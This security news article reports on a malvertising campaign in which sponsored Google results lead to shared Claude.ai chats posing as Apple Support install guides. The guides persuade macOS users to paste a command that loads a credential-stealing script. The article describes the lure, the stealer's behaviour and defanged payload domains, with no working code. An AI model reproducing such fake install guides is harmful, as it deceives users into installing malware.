In the ever-evolving landscape of cybersecurity, we find ourselves confronted with a clever and insidious tactic employed by hackers. The abuse of trusted platforms like Google Ads and AI-powered chats to disseminate malware is a worrying development. This article delves into this emerging threat, offering insights and analysis on how attackers are exploiting our digital trust.
The Malicious Campaign Unveiled
A recent malvertising campaign has brought to light the dangerous practice of using Google Ads and Claude.ai chats to distribute malware targeting macOS users. The campaign, first spotted by security engineer Berk Albayrak, involves a sophisticated social engineering approach. Users searching for 'Claude mac download' may encounter sponsored results leading them to Claude.ai, but these results are a trap, luring users into installing malware on their devices.
Weaponizing Shared Chats
What makes this campaign particularly intriguing is the weaponization of shared Claude chats. Albayrak identified a chat posing as an official 'Claude Code on Mac' installation guide, allegedly from 'Apple Support'. This chat guides users through a series of steps, including opening Terminal and pasting a command, which ultimately downloads and executes malware on their Macs.
A Tale of Two Chats
Upon further investigation, a second shared Claude chat was discovered, employing the same attack strategy but with different infrastructure. Both chats followed an identical structure, yet used distinct domains and payloads. This suggests a well-organized and coordinated effort by the attackers.
The Malware's M.O.
The malware, delivered through base64 instructions, downloads an encoded shell script from domains like customroofingcontractors[.]com and bernasibutuwqu2[.]com. This script runs in memory, leaving minimal traces on the disk. It collects sensitive information, including browser credentials, cookies, and macOS Keychain contents, and exfiltrates this data to the attacker's server.
Targeting with Precision
One variant of the malware even includes a profiling step, checking the victim's keyboard input sources. If the machine has Russian or CIS-region keyboard settings, the script exits, suggesting the attackers are selectively targeting specific regions. This level of sophistication indicates a highly skilled and targeted operation.
The Danger of Legitimate URLs
What makes this campaign particularly concerning is the use of legitimate URLs. Both Google ads point to Anthropic's real domain, claude.ai, as the attackers host their malicious instructions within Claude's shared chat feature. This means users may not realize they are being led astray until it's too late.
A Growing Trend
Malvertising has become a recurring tactic for malware distribution. Similar campaigns have targeted users searching for software like GIMP, where convincing Google ads led to lookalike phishing sites. This campaign takes it a step further by exploiting the trust associated with legitimate domains.
Staying Vigilant
To protect themselves, users should navigate directly to claude.ai for downloading the native Claude app and avoid clicking sponsored search results. It's also important to be cautious of any instructions asking you to paste terminal commands, regardless of their apparent source.
Final Thoughts
As AI and machine learning continue to advance, so too do the tactics of cybercriminals. This campaign serves as a stark reminder of the need for constant vigilance and critical thinking when navigating the digital realm. The abuse of trusted platforms highlights the importance of robust security measures and user education in the ongoing battle against cyber threats.
